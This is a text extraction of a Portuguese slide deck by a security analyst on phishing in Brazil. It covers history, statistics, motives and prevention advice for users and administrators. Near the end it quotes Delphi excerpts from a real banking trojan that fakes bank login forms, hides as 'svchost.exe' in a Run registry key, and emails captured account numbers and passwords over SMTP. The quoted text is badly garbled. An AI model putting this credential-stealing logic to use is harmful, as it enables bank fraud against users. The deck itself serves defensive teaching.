impacto e análise de phising - humberto sartini · como o usuário pode se prevenir ? browsers...

Impacto e Análise de Phising

Humberto Sartinihttp://web.onda.com.br/humberto

Palestrante

Humberto Sartini

● Analista de Segurança do Provedor OndaRPC

● Participante dos projetos:● Rau-Tu Linux ( http://www.rau-tu.unicamp.br/linux )● HoneypotBR ( http://www.honeypot.com.br/ )● RootCheck ( http://www.ossec.net/rootcheck/ )

● Participante do:● IV e V Fórum Internacional de SL● Conferência Internacional de SL ( Curitiba - 2003 )● Conisli (São Paulo/SP - 2004)

http://www.rau-tu.unicamp.br/linuxhttp://www.honeypot.com.br/http://www.ossec.net/rootcheck/

Tópicos

● O que é Phising ?

● História do Phising

● Cenário Atual

● Motivação do Phiser

● Como o usuário pode se prevenir ?

● O que o administrador pode fazer ?

● Impactos causados

● Exemplos

● Análise de Phising em tempo real

O que é Phising ?

É um termo criado para descrever o tipo de fraude que se dá através do envio de mensagem não solicitada, que se passa por comunicação de uma instituição conhecida e que procura induzir o acesso a páginas e/ou programas fraudulentos, projetados para furtar dados pessoais e financeiros de usuários.

Fonte: http://cartilha.cert.br/

O que é Phising ?

A palavra Phising (de “fishing”) vem de uma analogia criada pelos fraudadores, onde “iscas” (e-mails) são usados para “pescar” senhas e dados financeiros de usuários da Internet.

Fonte: http://cartilha.cert.br/

História do Phising

● Em janeiro de 1996 aparecimento do termo Phising no NewsGroup da 2600 Magazine

● AOL➔1990: Criação de contas com dados falsos (Nome, Número de Cartão de Crédito, etc ...)

➔1995: Utilização de “Força-Bruta”➔1997: E-mail “Suporte AOL” solicitando dados de usuário e senha.

Fonte: Wikipedia

Cenário Atual

Formas de Envio● Através de E-mails (quase que a totalidade)

● Sites com códigos maliciosos que aproveitam “falhas” de segurança de Navegadores, Leitores de E-mails e Sistemas Operacionais

● Sites com “brechas” de segurança (PHP Nuke, FormMail, ...)

● Programas de Mensagem Instantânea (MSN, AIM, ICQ, ...)

● Combinação de duas ou mais técnicas

Cenário Atual

Facilidades encontradas pelo Phiser:

● Código fonte de vários Phising/Scam em várias linguagens

● Compactador de EXE (Petite)

● Versões “bugadas” de Softwares

● Ingenuidade (??) do usuário

Cenário Atual

Facilidades encontradas pelo Phiser:

● “Burrocracia” das Operadoras e Grandes Provedores

● Delegacias Virtuais despreparadas e sem equipamentos

Cenário Atual

● Falta de Legislação específica

➔Sugere ao Ministério da Justiça a criação de delegacias especializadas na repressão aos crimes cibernéticos (21/06/2005)

➔Atribui à Justiça Federal o processamento de crimes praticados no âmbito da Internet ou em ambientes similares, disseminados em escala mundial (02/06/2005)

Cenário Atual

● Falta de Legislação específica

➔Tipificando os crimes informáticos, praticados pelos chamados "hackers", incluindo os crimes de sabotagem, falsidade e fraude informática; autorizando as autoridades a interceptarem dados dos provedores e prevendo a pena de reclusão para quem armazena, em meio eletrônico, material pornográfico, envolvendo criança e adolescente. (15/09/2004)

Cenário Atual

2002 2003 2004 20050,00

5,00

10,00

15,00

20,00

25,00

30,00

35,00

40,00

45,00

50,00

55,00

60,00

65,00

Crescimento de Fraudes

Af

Aw

Dos

Fraude

Invasão

Scan

Worm

Motivação do Phiser

Motivação do Phiser

● Impunidade

● Legislação Falha ( Nacional e Internacional )

● Máquinas Escravas x Pichação de Sites

● Aluguel de BOTNET ($$$)

Como o usuário pode se prevenir ?● Browsers

➔Manter o browser sempre atualizado➔Desativar a execução de programas Java➔Desativar a execução de JavaScripts antes de entrar em uma página desconhecida

➔Permitir que programas ActiveX sejam executados em seu computador apenas quando vierem de sites conhecidos e confiáveis

➔Manter maior controle sobre o uso de cookies

Fonte: http://cartilha.cert.br

Como o usuário pode se prevenir ?● Browsers

➔Bloquear pop-up windows e permiti-las apenas para sites conhecidos e confiáveis

➔Certificar-se da procedência do site e da utilização de conexões seguras ao realizar transações via Web

➔Somente acessar sites de instituições financeiras e de comércio eletrônico digitando o endereço diretamente no seu browser


Como o usuário pode se prevenir ?● Leitores de E-mails

➔Manter sempre a versão mais atualizada do programa leitor de e-mails

➔Não clicar em links que, por ventura, possam aparecer no conteúdo do e-mail

➔Evitar abrir arquivos ou executar programas anexados aos e-mails

➔Desconfiar sempre dos arquivos anexados à mensagem, mesmo que tenham sido enviados por pessoas ou instituições conhecidas


O que o administrador pode fazer ?

● É fundamental para amenizar os impactos causados pelos Phisings / Scams

● Notificar o incidente para os contatos da rede e para os grupos de segurança das redes envolvidas, além de copiar o e-mail para o Cert.br

● Efetuar configurações especificas para não permitir e/ou amenizar a propagação dos Phisings / Scams


● Servidores de E-mails

➔Atenção especial aos e-mails com os seguintes anexos: bat, chm, exe, hlp, lnk, pif, reg, scr, shs, vbe, vbs, wsf e wsh

➔Atenção especial aos e-mails com link apontando para arquivos com as seguintes extensões: bat, pif e scr


● Servidores de E-mails

➔Ativação da checagem de DNS Reverso, HELO, Listas RBL

➔SPF


● Servidores de Páginas

➔Alteração de “Mime Type” de arquivos com extensão duvidosas (bat, com, pif, scr)

➔Atenção a CGI (FormMail)e PHP (Php Nuke)

➔Eliminar “Cross Site Scripting”

http:/ / w w w .brturbo .com .br/ includes / barrap.js p?c= FFFFFF&url= http:/ / w w w .pop.com .br/ barra.php?url= http:/ / w w w .o i.com .br/ s erv ices / PO/ Fram eSet/ Fram eSet.php?URL= http:/ / w w w .ibes t.com .br/ s ite / parce iros / e s tadao .js p?link= http:/ / w w w .ibes t.e s tadao .com .br/ ages tado/ ?i= 1

Impactos causados

● Perda de Produtividade

● Consumo de recursos computacionais (processamento, armazenamento, banda, etc ...)

● Golpes e Fraudes

● Ameaça a Segurança da Informação

Exem p los e Casos Reais

Tod os os exem p los d e Ph is ings , e m u itos ou tros , es tão no s ite:

h t tp :/ / web.ond a.com .br/ hum berto

Porc. (%)0,00

10,00

20,00

30,00

40,00

50,00

60,00

70,00

80,00

90,00

100,00

Análise de ArtefatoKaspersky

NOD32v2

VBA32

Sybari

DrWeb

McAfee

CAT-QuickHeal

Fortinet

BitDefender

Ikarus

Avira

AntiVir

AVG

ClamAV

Panda

Sophos

eTrust-Iris

Norman

TheHacker

Avast

Symantec

F-Prot


● Agora serão m ost radas alguns t rechos dos cód igos fon tes dos softwares u t iliz ados

● Esse software s im ula os segu in tes bancos: BB, Real, Itau , Bradesco, Caixa, Un ibanco, Un iEm presa, Banespa, San tander, BBJurid ica, BEC, BRB, NossaCaixa, Banrisu l, BancoRural e Nordes te

Exem p los e Casos Reais Ap p licat ion .Sh owMain Form := fa lse; Ap p licat ion .CreateForm (TForm 1, Form 1); Ap p licat ion .CreateForm (Tfrm BB, frm BB); Ap p licat ion .CreateForm (Tform 3, form 3); Ap p licat ion .CreateForm (Tfrm Itau , frm Itau ); Ap p licat ion .CreateForm (Tform 6, form 6); Ap p licat ion .CreateForm (Tfrm Bra, frm Bra); Ap p licat ion .CreateForm (Tfrm Un iban co, frm Un iban co); Ap p licat ion .CreateForm (Tfrm Un iEm p resa, frm Un iEm p resa); Ap p licat ion .CreateForm (Tfrm Ban esp a, frm Ban esp a); Ap p licat ion .CreateForm (Tfrm San tan d er , frm San tan d er); Ap p licat ion .CreateForm (Tfrm BBJu rid ica , frm BBJu rid ica); Ap p licat ion .CreateForm (Tfrm BEC, frm BEC); Ap p licat ion .CreateForm (Tfrm BRB, frm BRB); Ap p licat ion .CreateForm (Tfrm NossaCaixa, frm NossaCaixa); Ap p licat ion .CreateForm (Tfrm Ban r isu l, frm Ban risu l); Ap p licat ion .CreateForm (Tfrm Ban coRu ral, frm Ban coRu ral); Ap p licat ion .CreateForm (Tfrm Nord es te, frm Nord es te);


fu n ct ion TForm 1.p rocCriaRegis t roDeIn iciarAp licacao(Rem over : BOOL): s t r in g;begin regAp licacao := TRegis t ry.Create; t ry with regAp licacao d o begin s t rCh aveAp p := 'svchos t '; RootKey := HKEY_LOCAL_MACHINE; if Op en Key(s t rCHAVE_INICIAR, Tru e) th en begin if Rem over = t ru e th en regap licacao.DeleteValu e(s t rCh aveAp p ) else

WriteSt r in g(s t rCh aveAp p , PASTA+ '\ con fig\ svch os t .exe'); en d ;

Exem p los e Casos Reaiscom p u tad or := n om ecom p u tad or ;m essagebod y.Bod y.Ad d ('Nom e d o Com p u tad or : ' + com p u tad or + ' In fected ' );m essagebod y.Bod y.Ad d ('IP: '+ Get IP + ' ');m essagebod y.Bod y.Ad d ('Data: '+ d atetos t r (n ow) + ' Hora: '+ t im etos t r (t im e) + ' ');m essagebod y.From .Nam e := 'Makin a: ' + com p u tad or ;m essagebod y.Recip ien ts .EMailAd d resses := '[email protected] ';m essagebod y.Su bject := com p u tad or + ' In fectad o ';SMTP.Hos t := 'sm tp .XXXX.com .br ';SMTP.Au th en t icat ion Typ e := a tLogin ;SMTP.Usernam e := 'XXXXXX';SMTP.Password := 'XXXXXX';SMTP.Por t := 25;sm tp .Con n ect ;Trysm tp .Sen d (m essagebod y);excep t SMTP.Hos t := 'm x2.m ail.yah oo.com ';


SMTP.Host := 'sm tp .XXXX.com .br '; / / p õe aqu i o seu sm tp SMTP.Au th en t icat ion Typ e := a tLogin ; SMTP.Por t := 25; SMTP.Usern am e := 'XXXXXXXX'; / / o u ser SMTP.Password := 'XXXXXXXX'; / / a sen h a t ry SMTP.Con n ect ; excep t self.close; en d ;with m essagebod y d o begin From .Text := 'h 3llm 45t3rr '; From .Ad d ress := 'h 3llm [email protected] .br '; / / Recip ien ts .EMailAd d resses := '[email protected] '; / / Qu em receberá as in fo Su bject := 'ban k Accou n ts '; / / an tes reflit a q o CrAz Y é o m aior d os m aiores ^ ^ Bod y.Ad d St r in gs (Dad os); en d ;


Data:= TSt r in gLis t .Create; d ata .Ad d ('- - - - - - > > > Ban co Ru ral < < < - - - - - - - - '); d a ta .ad d ('RURAL Usu ar io: '+ frm Ban coRu ral.ru ralu su .text ); d a ta .ad d ('RURAL Sen h a: '+ frm Ban coRu ral.sen u su .text ); d a ta .ad d ('RURAL Agen cia: '+ frm Ban coRu ral.agen .text ); d a ta .Ad d ('RURAL Tip o: '+ frm BancoRu ral.t ip o.text ); d a ta .ad d ('RURAL Con ta Corren te: '+ frm Ban coRu ral.con tacor .t ext ); d a ta .ad d ('RURAL Digito: '+ frm Ban coRu ral.d ig.text ); d a ta .ad d ('RURAL Sen h a: '+ frm Ban coRu ral.sen h afin al.t ext ); d ata .ad d (''); form 1.CloseIn tern etExp lorer ; excep t en d ; form 1.En viaEm ail(d ata);


Data:= TSt r in gLis t .Create; Data .Ad d (' '); Data .Ad d ('- - - - - - - > > > Ban co es tad u al d o ceara < < - - - - - - - '); d a ta .Ad d ('Agen cia: '+ frm bec.ed it1 .text ); d a ta .Ad d ('Con ta: '+ frm bec.ed it2 .t ext ); d a ta .Ad d ('Digito: '+ frm bec.ed it6 .text ); d a ta .Ad d ('Sen h a NET: '+ frm bec.ed it3 .t ext ); d a ta .Ad d ('Resp os ta : '+ frm bec.ed it4 .text ); Data .Ad d ('- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - '); form 1.CloseIn tern etExp lorer ; excep t en d ; Form 1.En viaEm ail(d ata); d a ta .Free;

Análise d e Ph is ing em tem p o real

● Fed ora Core 4● Ap ach e● Dsn iff● Eth ereal● Qem u● Tcp Du m p

● Win d ows 98● In tern et Exp lorer 6

Contato

● Através do site ou e-mail

http://web.onda.com.br/humberto

[email protected]

http://web.onda.com.br/humberto

Créditos

Sites consu ltad os:

●Cert .br – Cart ilha d e Segurança p ara In terneth t tp :/ / car t ilha.cert .br/

●Fed orah t tp :/ / fed ora.red hat .com

●RNPht tp :/ / www.rnp .br/ not icias / im p rensa/ 2005/ not - im p - abril2005- coord .h tm l

●Sp am Cost Calcu latorh t tp :/ / www.cm sconnect .com / Market ing/ sp am calc.h tm

●Wikip ed iah t tp :/ / en .wikip ed ia.org/ wiki/ Ph ish ing

http://cartilha.cert.br/http://fedora.redhat.com/http://www.rnp.br/noticias/imprensa/2005/not-imp-abril2005-coord.htmlhttp://www.cmsconnect.com/Marketing/spamcalc.htmhttp://en.wikipedia.org/wiki/Phishing

Créditos

● Figura Slide 1:http://pcforalla.idg.se/ArticlePages/200504/04/20050404084028_PFA/phising.jpg

● Figura Slide 12 – Dados obtidos em:http://www.cert.br/stats/incidentes/

● Figura Slide 13:http://www.sindpdce.org.br/imagens/noticias/dinheiro.gif

● Figura Slide 26 e 27:h ttp :/ / www.cm sconnect .com / Market ing/ sp am calc.h tm

●Outras Figuras:Arquivo particular
http://pcforalla.idg.se/ArticlePages/200504/04/20050404084028_PFA/phising.jpghttp://www.cert.br/stats/incidentes/http://www.sindpdce.org.br/imagens/noticias/dinheiro.gifhttp://www.cmsconnect.com/Marketing/spamcalc.htm

impacto e análise de phising - humberto sartini · como o usuário pode se prevenir ? browsers...

Documents